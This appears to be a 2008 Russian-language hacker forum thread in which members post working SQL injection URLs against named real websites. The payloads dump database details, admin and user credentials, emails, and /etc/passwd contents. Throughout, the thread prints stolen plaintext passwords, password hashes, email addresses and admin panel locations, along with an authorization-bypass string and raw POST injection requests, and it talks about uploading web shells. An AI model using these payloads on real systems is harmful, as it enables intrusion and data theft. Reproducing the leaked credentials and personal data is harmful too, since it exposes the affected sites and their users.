ЗЫ. Зальете шелл дайте знать :)

3xIm3

28.09.2008, 06:28

http://yogacenter.ru/page.php?id=-2+union+select+table_name,2,3,4,5+from+INFORMATION _SCHEMA.TABLES+limit+19,1

http://www.biblicaltraining.org/class.php?id=-1+union+select+1,2,3,4,concat(firstname,0x3a,passw d,0x3a,lastname,0x3a,email),6,7,8,9,10,11,12,13,14 ,15,16+FROM+bt_users--

Ed:luke00:Dingess:edingess@carolina.rr.com

3xIm3

28.09.2008, 06:37

http://www.prescare.org.au/article.php?es_id=-12+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15/*

http://www.prescare.org.au/article.php?es_id=-22+union+select+1,concat_ws(char(58),version(),use r(),database()),3,4,5,6,7,8,9,0,1,2,3,4,5/*

http://www.destinations.com.bs/package.php?es_id=47+union+select+1,concat_ws(char (58),version(),user(),database()),3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0/*

http://alpineinternationalschool.com/article.php?es_id=2+union+select+1,concat_ws(char( 58),version(),user(),database()),3,4,5,6,7,8,9,0,1 ,2,3,4,5/*

3xIm3

28.09.2008, 07:54

http://www.pku.org/pages/news.php?id=408+UNION+SELECT+1,2,concat_ws(0x3a,pa ssword,email)+FROM+member--

http://www.stots.edu/article.php?id=...a,password,0x3 a,host),4,5,6,7,8+from+mysql.user+limit+1,1--

http://www.snseurope.com/snslink/new...17,18,19,20+fr om+users--

luz3r

28.09.2008, 12:55

http://www.netservice.ru/portfolio_details.php?id=-99+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14/*
4.0.27-log

bons

28.09.2008, 19:27

баги на www.ekranka.ru

http://www.ekranka.ru/?id=nx'+union+select+1,2,concat(version(),'::',use r(),'::',database()),4,5,6--+AND+'0'='1

version() = 5.0.51-3-log
user() = ekranka_1@77.221.130.15
database() = ekranka_1

все таблицы и поля из этой базы:

http://www.ekranka.ru/?m=recs&author=gordeeva'+union+select+1,COLUMN_NAME,3,4,5, 6,ORDINAL_POSITION,TABLE_NAME,9+FROM+INFORMATION_S CHEMA.COLUMNS+WHERE+TABLE_SCHEMA!='INFORMATION_SCH EMA'--+AND+'1'='1

Shaitan-Devil

28.09.2008, 20:31

Обход авторизации

http://fp24.ru/admin/index.php

' ' or+1=1/*

http://www.chukotken.ru/?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(0x3a,lo gin,passw),12,13,14,15+from+admin/*

alexis:SiteAdmin

neonik

29.09.2008, 01:45

http://trusteelearning.org/

_http://trusteelearning.org/news_read.php?id=-1/**/union/**/select/**/1,concat(user(),0x20,version(),0x20,database()),3, 4,3,6,7,8,9/*

Database Version: 4.1.20-max-log
Database name: savoadm_etraining
User name: savoadm_pilot2@72.41.255.204

Iceangel_

29.09.2008, 04:06

http://www.hcs.harvard.edu/~hib/viewannounce.php?ID=-26+union+select+1,2,3,4,5/*
5.0.22-Debian_0ubuntu6.06.2-log

KPOT_f!nd

29.09.2008, 17:07

http://www.stva.us/product.php?pid=-1+union+select+1,2,version(),4,5,6,7,8,9/*&id=12&brand=267

http://www.shopmuseum.com/product.php?id=-1%27+union+select+1,2,3,username,5,6,7,8,9,10,11,p assword,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39+from+users+ limit+4,1/*&cat_id=15&sub_id=139

http://www.jennystackshop.com/product.php?id=-1+union+select+1,2,3,count(table_name),5,6,7,8,9,1 0,11,12,13,14,15,16,17+from+information_schema.tab les/*

neonik

29.09.2008, 18:27

_http://www.pointplustraining.com/

_http://www.pointplustraining.com/news_read.php?id=-1/**/union/**/select/**/1,concat(user(),0x20,version(),0x20,database()),3, 4,3,6,7,8,9--

Database Version: 5.0.51a-community
Database name: seobiz_etraining
User name: seobiz_etraini@localhost

admin : riyeke : eca045e0815166abc06a3cdc9a3502c5

KaJIaLL1HuKoB

29.09.2008, 18:31

hxxp://www.ubisoft.ru

http://www.ubisoft.ru/games/game.php?id=-444+union+select+1,concat(user(),0x20,version(),0x 20,database()),3,4,5,6,7,8,9,10,11

neonik

29.09.2008, 22:47

_http://yuutu.be/

_http://yuutu.be/index.php?loadpage=./includes/articleblock.php&articlecat=./includes/articleblock.php&articlecat=./includes/articleblock.php&articlecat=-1+union+select+1,version(),user(),4,5,6,7,8,9,10--

5.0.27-standard
yuutube_db@r5p.nswebhost.com

KPOT_f!nd

30.09.2008, 00:59

http://www.berneboek.com/shop/product.php?id=-1+union+select+concat_ws(email,0x3a,password),2,3, 4+from+users+limit+2921,1/*

Ch3ck

30.09.2008, 01:33

От нехер делать по http://yuutu.be/
http://yuutu.be/index.php?loadpage=./includes/articleblock.php&articlecat=./includes/articleblock.php&articlecat=./includes/articleblock.php&articlecat=-1+union+select+1,concat_ws(0x3a,userkey,username,p assword,ip,email),3,4,5,6,7,8,9,10+from+AMCMS_user s+limit+0,1/*
1:admin:03a612184a8c36b697f330ab03ca5c692584027f:7 6.247.63.232:futhey@gmail.com

Shaitan-Devil

30.09.2008, 10:03

http://www.sport.v-lazer.com/news.php?ID=-16+union+select+1,2,3,column_name+from+information _schema.columns+where+table_name=0x6370673133325f7 573657273+limit+4,1/*

таблица с пасами

warlok

30.09.2008, 11:06

http://davinciinstitute.com/page.php?ID=-120'+union+select+1,2,3,concat_ws(0x3a,LoginName,P assword),5,6+from+AdminUsers/*
version() - 5.0.42
user() - davinci@localhost
database() - davinciinstitute_com

_Pantera_

30.09.2008, 17:05

http://www.economics.neu.edu/exploring/index.php?pid=-3+union+select+1,version(),user(),4,5/*
mysql - 5

http://artsci.wustl.edu/~history/faculty/index.php?pid=1+and+ascii(lower(substring(version( ),1,1)))=53/*&action=dspPersonFull
mysql - 5

http://www.mentorcollege.edu/index.php?pid=-3+union+select+1,2,3,version(),5/*
mysql - 5

neonik

30.09.2008, 20:06

_http://flakas.49.lt

_http://flakas.49.lt/index.php?loadpage=./includes/articleblock.php&articlecat=-1

1:admin:0df2c3843ee8c2ca4c430b64c7b2f5ce2753c289:
78.62.125.196:info@49.lt

http://escapedturkey.com

http://escapedturkey.com/cfaq/index.php?catid=-2+union+select+concat(username,0x3a,password),2+FR OM+cfaq_admin/*
Database Version: 5.0.45-community
Database name: escapedtur_faq
User name: et_rofaq@localhost

-=Static=-

30.09.2008, 21:56

http://www.sport.v-lazer.com/news.php?ID=-16+union+select+1,2,3,column_name+from+information _schema.columns+where+table_name=0x6370673133325f7 573657273+limit+4,1/*

таблица с пасами

Вот Список всех баз/таблиц на Мускульном серваке. Там не только пасы от галереи "Океан" =) У кого есть желание - копайте))

OceanBase.cpg_albums
OceanBase.cpg_banned
OceanBase.cpg_categories
OceanBase.cpg_comments
OceanBase.cpg_config
OceanBase.cpg_ecards
OceanBase.cpg_exif
OceanBase.cpg_filetypes
OceanBase.cpg_pictures
OceanBase.cpg_temp_data
OceanBase.cpg_usergroups
OceanBase.cpg_users
OceanBase.cpg_votes
OceanBase.freehouses
bannerdb.phpads_acls
bannerdb.phpads_adclicks
bannerdb.phpads_adstats
bannerdb.phpads_adviews
bannerdb.phpads_affiliates
bannerdb.phpads_banners
bannerdb.phpads_cache
bannerdb.phpads_clients
bannerdb.phpads_config
bannerdb.phpads_images
bannerdb.phpads_session
bannerdb.phpads_targetstats
bannerdb.phpads_userlog
bannerdb.phpads_zones
catalog.course
catalog.firms
catalog.firms_copy
catalog.goods
catalog.goods_copy
catalog.groups
catalog.links
catalog.pict
catalog.pictures
catalog.podvid
catalog.podvid_copy
catalog.prices
catalog.sale
catalog.shops
catalog.shops_copy
catalog.shops_pict
catalog.spec
catalog.towns
catalog.towns_copy
catalog.vid
catalog.vid_copy
charity.contents
charity.news
condor.admin_modules
condor.admin_modules_content
condor.admin_users
condor.admin_users_rights
condor.cat
condor.catalog
condor.contents
condor.examples
condor.news
condor.type
dbt.actions
dbt.contents
dbt.leaders
dbt.news
dbt.services
dbt.shop_picts
dbt.shops
dbt.superlow
dbt.towns
dbt.vid
domain.groups
domain.ublocks
domain.ugroups
domain.users
lite.actionstatus
lite.and_photodocs
lite.and_photorep
lite.and_videodocs
lite.and_videorep
lite.artrubrics
lite.blocks
lite.brands
lite.bscripts
lite.category
lite.condor_actions
lite.condor_contacts
lite.condor_events
lite.condor_partners
lite.condor_projects
lite.countries
lite.dbt_actions
lite.dbt_actphotos
lite.dbt_contacts
lite.dbt_events
lite.dbt_partners
lite.dbt_prices
lite.dbt_products
lite.dbt_projects
lite.dbt_shops
lite.depts
lite.dmr_points
lite.dmr_actions
lite.dmr_actphotos
lite.dmr_contacts
lite.dmr_events
lite.dmr_market
lite.dmr_marketdocs
lite.dmr_products
lite.dmr_reclama
lite.dmr_reclamadocs
lite.dmr_service
lite.dmr_suvenir
lite.doctype
lite.eventstatus
lite.gonets_actions
lite.gonets_actphotos
lite.gonets_contacts
lite.gonets_events
lite.gonets_np
lite.gonets_partners
lite.gonets_prices
lite.gonets_projects
lite.gonets_service
lite.gonets_smiarticles
lite.linkcategory
lite.linkrubrics
lite.links
lite.linkstatus
lite.main_events
lite.mbscripts
lite.module_events
lite.numberstatus
lite.ocean_articles
lite.ocean_numbers
lite.ocean_photos
lite.partners
lite.partnersp
lite.prcategory
lite.prestige_actions
lite.prestige_contacts
lite.prestige_events
lite.prestige_partners
lite.prestige_prices
lite.prestige_projects
lite.prod_actions
lite.prod_actphotos
lite.prod_contacts
lite.prod_events
lite.prod_partners
lite.prod_prices
lite.prod_projects
lite.prod_shops
lite.prrubrics
lite.regions
lite.rodina_actions
lite.rodina_actphotos
lite.rodina_contacts
lite.rodina_events
lite.rodina_partners
lite.rodina_prices
lite.rodina_products
lite.rodina_projects
lite.rodina_smiarticles
lite.rubrics
lite.sercategory
lite.serrubrics
lite.smi
lite.sport_actions
lite.sport_actphotos
lite.sport_events
lite.sport_prices
lite.subscr
lite.subscrusers
lite.vega_actions
lite.vega_contacts
lite.vega_events
lite.vega_job
lite.vega_managers
lite.vega_partners
lite.vega_projects
lite.vega_smiarticles
lite.vll_actions
lite.vll_actphotos
lite.vll_contacts
lite.vll_events
lite.vll_partners
lite.vll_points
lite.vll_prices
lite.vll_projects
lite.vll_service
lite.zocean_actions
lite.zocean_actphotos
lite.zocean_contacts
lite.zocean_events
lite.zocean_partners
lite.zocean_points
lite.zocean_prices
lite.zocean_products
lite.zocean_projects
logistic._cn_articles
logistic._cn_configuration_log
logistic._cn_forms
logistic._cn_forms_categories
logistic._cn_forms_data
logistic._cn_news
logistic._cn_news_categories
logistic._cn_news_themes
logistic._cn_pages
logistic._cn_pages_blocks
logistic._cn_pages_context_menu
logistic._cn_pages_context_menu_items
logistic._cn_pages_internal_links
logistic._cn_pages_templates
logistic._cn_vacancies
logistic._cn_vacancies_categories
logistic._cn_vacancies_fields
logistic._eng_articles
logistic._eng_configuration_log
logistic._eng_forms
logistic._eng_forms_categories
logistic._eng_forms_data
logistic._eng_news
logistic._eng_news_categories
logistic._eng_news_themes
logistic._eng_pages
logistic._eng_pages_blocks
logistic._eng_pages_context_menu
logistic._eng_pages_context_menu_items
logistic._eng_pages_internal_links
logistic._eng_pages_templates
logistic._eng_vacancies
logistic._eng_vacancies_categories
logistic._eng_vacancies_fields
logistic._rus_articles
logistic._rus_banners
logistic._rus_banners_categories
logistic._rus_catalog_categories
logistic._rus_catalog_concerned_products
logistic._rus_catalog_groups
logistic._rus_catalog_products
logistic._rus_catalog_properties
logistic._rus_catalog_properties_def_values
logistic._rus_catalog_properties_discounts
logistic._rus_catalog_properties_table
logistic._rus_catalog_property_images
logistic._rus_catalog_property_types_images
logistic._rus_catalog_property_values
logistic._rus_catalog_ptypes
logistic._rus_configuration_log
logistic._rus_faq
logistic._rus_faq_categories
logistic._rus_forms
logistic._rus_forms_categories
logistic._rus_forms_data
logistic._rus_gallery
logistic._rus_gallery_categories
logistic._rus_hotprod
logistic._rus_hotprod_categories
logistic._rus_news
logistic._rus_news_categories
logistic._rus_news_themes
logistic._rus_pages
logistic._rus_pages_blocks
logistic._rus_pages_context_menu
logistic._rus_pages_context_menu_items
logistic._rus_pages_internal_links
logistic._rus_pages_templates
logistic._rus_vacancies
logistic._rus_vacancies_categories
logistic._rus_vacancies_fields
logistic.contents
logistic.conts
logistic.modules
logistic.news
logistic.sites
logistic.sites_alias
logistic.sites_languages
logistic.sites_modules
logistic.subscr
logistic.users
logistic.users_groups
logistic.users_roles
logistic.users_roles_groups
logistic.users_roles_permissions
papyrus.p_call
papyrus.p_call_goods
papyrus.p_call_theme
papyrus.p_cathegory
papyrus.p_company
papyrus.p_country
papyrus.p_goods
papyrus.p_theme
papyrus.p_user
pclub.banners
pclub.categories
pclub.contents
pclub.news
pclub.partners
pclub.towns
phpbb.phpbb_auth_access
phpbb.phpbb_banlist
phpbb.phpbb_categories
phpbb.phpbb_config
phpbb.phpbb_confirm
phpbb.phpbb_disallow
phpbb.phpbb_forum_prune
phpbb.phpbb_forums
phpbb.phpbb_groups
phpbb.phpbb_old_config
phpbb.phpbb_posts
phpbb.phpbb_posts_text
phpbb.phpbb_privmsgs
phpbb.phpbb_privmsgs_text
phpbb.phpbb_ranks
phpbb.phpbb_search_results
phpbb.phpbb_search_wordlist
phpbb.phpbb_search_wordmatch
phpbb.phpbb_sessions
phpbb.phpbb_sessions_keys
phpbb.phpbb_smilies
phpbb.phpbb_themes
phpbb.phpbb_themes_name
phpbb.phpbb_topics
phpbb.phpbb_topics_watch
phpbb.phpbb_user_group
phpbb.phpbb_users
phpbb.phpbb_vote_desc
phpbb.phpbb_vote_results
phpbb.phpbb_vote_voters
phpbb.phpbb_words
prestige.assert
prestige.city
prestige.contacts
prestige.events
prestige.lows
prestige.partners
prestige.rubrics
prestige.users
sotovik.spec
sotovik.towns

Pashkela

30.09.2008, 23:25

loveus.ru

http://loveus.ru/forum/?roomid=341/**/union/**/select/**/version(),2--

Версия MySQL:
5.1.26-rc
-------
Имя базы:
lovas
-------
Юзер:
admin@localhost

Данные по полям User,Password,File_priv из таблицы mysql.user:
-------
root:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y
root:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y
Dunkan:*6FD087AFBFB4C2995C3C0AD9D2D5FB582CDDBF46:Y
lovas:*47B11BE6589C2FDE355C316D9DB18DB0C06CC536:Y
admin:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y

b3

30.09.2008, 23:57

www.glaad.org
/etc/passwd
http://www.glaad.org/media/resource_kit_detail.php?id=-3495+UNION+SELECT+1,2,3,4,5,LOAD_FILE(0x2F6574632F 706173737764),7,8,9,10,11,12,13,14,15,16,17,18,19, 20
file_priv=y
http://www.glaad.org/media/resource_kit_detail.php?id=-3495+UNION+SELECT+1,2,3,4,5,file_priv,7,8,9,10,11, 12,13,14,15,16,17,18,19,20+from+mysql.user
document root
/www/www/doc-root/media/resource_kit_detail.php
залить нелл не удалось, ненашел папку справами на запись

www.dissentmagazine.org
http://www.dissentmagazine.org/online.php?id=-117+UNION+SELECT+1,concat_ws(0x3a,user_name,user_p assword),3,4,5,6,7,8,9,10+from+user
admin:32fea379cc31c22c27761ec9d08e630c
root:0643c3fdceb7e8eeeaa914850a1eec85
админку неискал, хеши не расшифровывал =)

1337haxx0r

01.10.2008, 02:45

Всем привА.
Я тут решил запостится.
вообщем так.

вот сайтеГ нашёл
http://www.penpal.ru

решил же глянуть, чё там и к чему =)

Как всегда, стандартная проверка
http://www.penpal.ru/cgi-bin/person.pl?id=-1175185312'

Узнаем что имееЦЦо 28 полей, и одно принтабельное - 21
http://www.penpal.ru/cgi-bin/person.pl?id=1175185312+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28--

Версия скулИ 5-я
(пальцем в небо) ибо даже через http://www.penpal.ru/cgi-bin/person.pl?id=1175185312+and+substring(@@version,1, 1)=5 не признавалось, или это Я =)))))

короче полазил, полазил...нашёл таблицу person
а в ней поля
id - идентификаторы
passw - пароли в чистом виде
email - мылы
icq - аси(есть не у всех)

похакал.....и дальше пошёл
Одминку не нашёл =(

-----
P.S
Странно было, когда я ввёл в это принтабельное поле запрос version()....оно не выдало мне версию, а выдало что такой таблицы нету.

sabe

01.10.2008, 07:02

1337haxx0r
http://www.penpal.ru/cgi-bin/person.pl?id=1175185312+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,@@version,22 ,23,24,25,26,27,28--
а так не пробвал ? ))

b3

01.10.2008, 07:28

Официальный сайт Группы "Ляпис Трубецкой"
http://www.lyapis.com/anons.php?id=-3+UNION+SELECT+1,2,3,4,5+from+news
Единственная таблица которую нашел.

1337haxx0r

01.10.2008, 18:10

1337haxx0r

а так не пробвал ? ))

....фак, я и не знал....поэтому и не додумался =)

но спасибо, теперь уж буду знать =)

1337haxx0r

01.10.2008, 18:32

Вот ещё нашёл сайтеГ =)

Вообщем, проверяем и видим ошибочку скулЯ

http://www.kateeya.com/content.php?menu=-2'

имеем 6 полей одно принтабельное - 2

http://www.kateeya.com/content.php?menu=2+order+by+6--

http://www.kateeya.com/content.php?menu=2+union+select+1,2,3,4,5,6--

Версия скули 5-я
Значит заюзаем information_schema

http://www.kateeya.com/content.php?menu=2+union+select+1,concat_ws(0x3a3a 3a,table_name,column_name),3,4,5,6++from+informati on_schema.columns--

нам тут полный фарт, видим все таблицы с полями, ищем интерессные.....а это
siji_user:::user_id - идентификаторы
siji_user:::user_name - юзеры
siji_user:::user_pwd - пароли в чистом виде
siji_user:::user_email - мылы

смотрим и видим одну запись....которая нас радует и при этом поднимает настроение =)))))

http://www.kateeya.com/content.php?menu=2+union+select+1,concat_ws(0x3a3a 3a,user_name,user_pwd),3,4,5,6++from+siji_user--

Конечный итог:
Username: admin
Password: admin
Админка: http://www.kateeya.com/admin/login.php

----
Пока что всё, всем приятного и удачного хакинга =))))

1337haxx0r

01.10.2008, 19:52

ещё один бажный сайт.....хостинг

Проверяем
http://www.webhostingjury.com/hosts.php?id=-534'

имеем ошибкку, и узнаем что имееЦЦо 3 поля, одно принтабельно - 2

http://www.webhostingjury.com/hosts.php?id=-534+union+select+1,2,3--

Версия Мускуля 5-я
знач обращаемся к нашей информационной таблице information_schema

http://www.webhostingjury.com/hosts.php?id=-534+union+select+1,concat_ws(0x3a3a3a,table_name,c olumn_name),3+from+information_schema.columns--

ждём пока выведутся все поля и таблицы...

находим нас интересующие, а именно:

admin:::adm_username - имя админского юзера
admin:::adm_password - пароль в открытом виде

или

hosts:::username - имя юзера(хоста)
hosts::: password - пароли в чистом виде

http://www.webhostingjury.com
/hosts.php?id=-534+union+select+1,concat_ws(0x3a3a3a,adm_password ,adm_username),3+from+admin--

http://www.webhostingjury.com/hosts.php?id=-534+union+select+1,concat_ws(0x3a3a3a,password,use rname),3+from+hosts--

я брал админа.
получаем: imkool:::ajay

Конечный итог:
Admin Username: ajay
Admin Password: imkool

Админка: http://www.webhostingjury.com./adm/www/admin/index.php

---
...но почему-то не проходит инфа в админке...
логин юзеров не искал....

1337haxx0r

02.10.2008, 01:48

ну я сегодня в угаре(на работе нечего делать) =))))

сайт знакомств, с виду приличный...а как капнёшь глубже...ппц

Смотрим, скуля начинает ругаЦЦо =)
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215'

пробиваем поля, у нас их 23, из них штук 5 принтабельных.
Версия скулИ 5-я (везёт мне) =)

поперебирал я лимитом....нашёл таблицы

dating_adminmembers:::username
dating_adminmembers::: password
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,table_ name,column_name),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23+from+information_schema.columns+ limit+166,1--
и

members:::username
members::: password
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,table_ name,column_name),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23+from+information_schema.columns+ limit+519,1--

Я брал админа
http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,userna me,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23+from+dating_adminmembers--

admin:::admin456
пасс в чистейшем виде, оч замечательно =)

ОдминкО: http://www.datingfunda.com/webadmin/

1337haxx0r

02.10.2008, 19:06

ещё один хостинг

14 полей, два принтабельных - 6,7
http://www.torontowebhost.com/mod.php?mod=pages&mode=view&id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--

Версия скули 4-я
будем перебирать ручками...
и без особого труда нашлась табличка admins

в которой присутсвовали поля:
admin_user_name
admin_email

к сожалению поле с паролями не побобрал....пробовал много вариантов....но без результатно.
http://www.torontowebhost.com/mod.php?mod=pages&mode=view&id=-2+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,admin_ user_name,admin_email),7,8,9,10,11,12,13,14+from+a dmins--

webmaster:::webmaster@torontowebhost.com
может кому будет интерессно, подберёт =)

логин в админку:
http://www.torontowebhost.com/login.php?w=admin&o=login

-----
Там ещё в портфолио есть сайты.....так же коряво написаны

1337haxx0r

03.10.2008, 00:20

офф сайт украинской певицы Русланы

там 5-я версия скули.
http://www.ruslana.ua/ua/press.php?ln=-1+union+select+concat_ws(0x3a3a3a,table_name,colum n_name)+from+information_schema.columns--
одно поле...оно же принтабельно

http://www.ruslana.ua/ua/press.php?ln=-1+union+select+1--

имеем права на доступ к таблице mysql
http://www.ruslana.ua/ua/press.php?ln=-1+union+select+concat_ws(0x3a3a3a,user,password)+f rom+mysql.user--

показало три юзера

root:::*A6D3F6E96E35BC972C685AFE44507517B5C87F4C
root:::
astra:::*C301AD7E05B309F011D781BA2E1CD97AF0CC9622

дальше ничё особо не делал =)

3xIm3

03.10.2008, 04:50

http://www.davinciinstitute.com/page...ersion(),5,6/*

version: 5.0.42
user: davinci@localhost
database: davinciinstitute_com

http://trusteelearning.org/news_read...on(),6,7,8,9/*

version: 4.1.20-max-log
user: savoadm_pilot2@72.41.255.204
database: savoadm_etraining

http://quiddich.voldemort.ru/forum.p...,4,5,6,7,8,9/*

version: 4.1.22
user: voldemor_loki@localhost
database: voldemor_loki

http://www.bt-shop.ru/section_output...sion(),5,6,7/*

version: 4.0.27-log
user: bt-shop@zvm12.host.ru
database: bt-shop

TANZWUT

03.10.2008, 11:35

1

POST /buket/search/ HTTP/1.0
Host: www.difiori.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
Cookie: hotlog=1; goon=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 111

action=full&bt=-1+union+select+1,concat_ws(char(58),id,login,pwd,n ame,surname,addr,email,phone),3,4+from+user/*

2

POST /vidau/news/ HTTP/1.0
Host: www.vidau-tv.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
Cookie: hotlog=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 106

id=-1+union+select+1,2,concat_ws(char(58),user(),versi on(),database(),login,pwd),4,5+from+user+limit+1,1/*

апд: юзаем http://code.google.com/p/awebtool/ ;)

warlok

03.10.2008, 23:18

http://www.downtowncrossing.org/shop/shop.php?id=103+union+select+1,version(),3,4
version() - 5.0.51a-log
user() - Children
database() - Children

http://shop.vashtextil.com.ua/shop.php?id=-1'+union+select+1,2,3,4,5/*
user()- 1gbua_textil@213.186.117.201

http://www.spygenius.co.uk/shop.php?id=-1+union+all+select+1,2,version(),4,5,6
version() - 5.0.27-log
user() - spygenius@213.171.218.192
database() - spygenius

http://www.uazmadi.ru/shop.php?id=-6+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13
version() - 5.0.37
user() - avtomoto@localhost
database() - avtomoto

http://www.avtobamper.ru/shop.php?id=-2+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13
version() - 5.0.37
user() - avtomoto@localhost
database() - avtobamper

http://www.propertiesbulgaria.biz/shop.php?id=-11+union+select+version()
version() - 5.0.45-log -
user() - site@localhost
database() - property_site
http://www.propertiesbulgaria.biz/shop.php?id=-11+union+select+concat_ws(0x3a,userid,username,pas sword)+from+admin_users+limit%201,1

2:admin:$1$jzxqs61n$6hbnVvtb1cJMuHJUJgVEo1
3:alex:$1$rygwg7ng$vwJgHDDb6kOwbn5HcuvT80
4:silveto:$1$55ff1d9v$4ICVoQL.pf0eGBGviplP5.
5:test:$1$8mx0df49$y63yix4opv5W/.YYTAaUT/
6:petya:$1$9v1qx3yv$74NKlG/INFJictQUM6TGN0

http://www.propertiesbulgaria.biz/admin админка здесь ;)

beerhack

04.10.2008, 14:47

Міжрегіональна Академія управління персоналом (МАУП)
PR: 4
тИЦ: 180
http://www.maup.com.ua/news/newst.php?tema=-9999+union+select+1,2,version(),4,5/*

VERSION: 4.0.27-standard

luz3r

04.10.2008, 15:11

:rolleyes:
http://www.rabota.su/voting/stat.php?id=-99+union+select+1,concat(login,0x3a3a,pwd),3+from+ users--

http://www.gelezo.net/files.php?id=-99'+union+select+1,2,3,4,5,table_name,7,8,9,10,11, 12+from+information_schema.tables+limit+1,1/*

Nightmarе

04.10.2008, 15:38

Юмор ФМ, популярное радио и всё такое...
SQL inj присутствует чуть не в каждом параметре.
PR = 3 тИЦ = 30

1) Пятая ветка, доступ к "INFORMATION_SCHEMA" есть.
http://humor.fm/login/?error=1'+UNION%20SELECT%20CONCAT_WS(0x203A20,USER (),VERSION(),DATABASE())%23
humor@localhost : 5.0.51a-3ubuntu5.1-log : humor

2) Пойдём дальше. Получив все данные из "INFORMATION_SCHEMA"
http://humor.fm/login/?error=1'+UNION%20SELECT%20CONCAT_WS(0x203A20,logi n,email,password)%20from%20db_user%20LIMIT%200,1%2 3
0,1 - выводим по пользователю из БД.

3) А вот и наши админы:
admin : support@idea.net.ua : 5f7c5e847d547b984bab4020c33673ac
cappy : cappy@mail.ru : 168416487b5b0dea3478992a914c7706 - Пасс: fdnjh
qwas : qwas@idea.net.ua : c8e25115addeda1656b52cfbe7b2b780
Joker : joker@idea.net.ua : 589ca240c5222730de730b7013c3b9b6
Decoy : decoy@idea.net.ua : b882e3b467d649792fc4c0cc49592e90
dc : dc@humor.fm : fe07cb53c5b30a97380c6c87efad14b2
kerber : kerber@idea.net.ua : 58acb17af943b7218bca87690910c555 - Пасс: 100385

В итоге, админку не нашёл, в панели юзверей ничего интересного нету ;(

Так-же большое спасибо Alexsize за помощь по SQL

DJ ][akep

04.10.2008, 22:08

http://www.dissentmagazine.org/online.php?id=117+union+select+1,concat(version(), 0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,0/*

version: 4.1.22
user: dissent@localhost
database: dissent

Вывод внизу.

-----------------------------------------------------------

http://tinymce.moxiecode.com/changelog.php?id=8+union+select+1,2,3,4,5,6,concat (version(),0x3a,database(),0x3a,user()),8/*

version: 5.0.41-log
user: root@localhost
database: tinymce

sabe

04.10.2008, 23:26

офф сайт украинской певицы Русланы

http://www.ruslana.ua/ua/press.php?ln=-1+union+select+load_file(0x2F6574632F706173737764)--
file_priv a также dir )

http://www.ruslana.ua/ua/press.php?ln=-1+union+select+concat_ws(0x3a,username,user_passwo rd)+from+minibb_users--
юзеры форума.. forum.ruslana.ua

http://blog.ruslana.ua/wp-login.php
wp..

admin:$P$B3XVWvBWhENjDsGfhZvFnT9bwxsyI7/

дай пасс дам шелл )

пс: заветное поле - pword

[dword]

05.10.2008, 15:49

http://www.rechtsanwalt-kuprat.de/index2.php?q=dok&sprache=-1%27+union+select+1,2,3,4,5,concat_ws(0x3a,user_ty pe,user_name,user_pw),7,8,9,10+from+fastpublish__f orum_de_userdata/*

fastpublish cms

admin:skatrunde:0a8e991a10144d5056eac00f50b10f2f

masternet

05.10.2008, 16:09

http://www.bfgbank.ru/index.php?BFGBASID=d8ae804ab8c24dae8dee6eca71b1777 4&action=LegalServises'+union+select+1--
вот скуля на банке..дальше как крутить не знаю..+информатион_схема.те� �лес не идёт(((

Dimi4

05.10.2008, 16:42

Купил сегодня плеер - iRiver S10.
iriver.com.ua
Яндекс тІЦ 230

http://www.iriver.com.ua/publication.php?newsid=1486+UNION+SELECT+1,2,3,4,5/*

Database Version: 4.1.22-log
Database name: itkom
User name: dbuser@localhost

Мистерео

05.10.2008, 17:12

http://www.iriver.com.ua/publication.php?newsid=1486+UNION+SELECT+1,2,3,4,5 /*

Хекнул = )
http://www.iriver.com.ua/publication.php?newsid=1486+UNION+SELECT+1,concat_ ws(0x3a,login,password),3,4,5+from+users/*

Mary:c4ca4238a0b923820dcc509a6f75849b:1
Mary_admin:c81e728d9d4c2f636f067f89cc14862c:2
adm_price:063b610d39cfab2ec713e97510041189

= )

Админку не нашел кто найдет плиз скиньте в личку

sabe

05.10.2008, 20:41

Dimi4
http://www.iriver.com.ua/publication.php?newsid=-1486+union+select+1,concat_ws(0x3a,login,password) ,3,4,5+from+users/*
users
http://www.iriver.com.ua/publication.php?newsid=-1486+union+select+1,2,3,concat_ws(0x3a,user,passwo rd),5+from+mysql.user/*

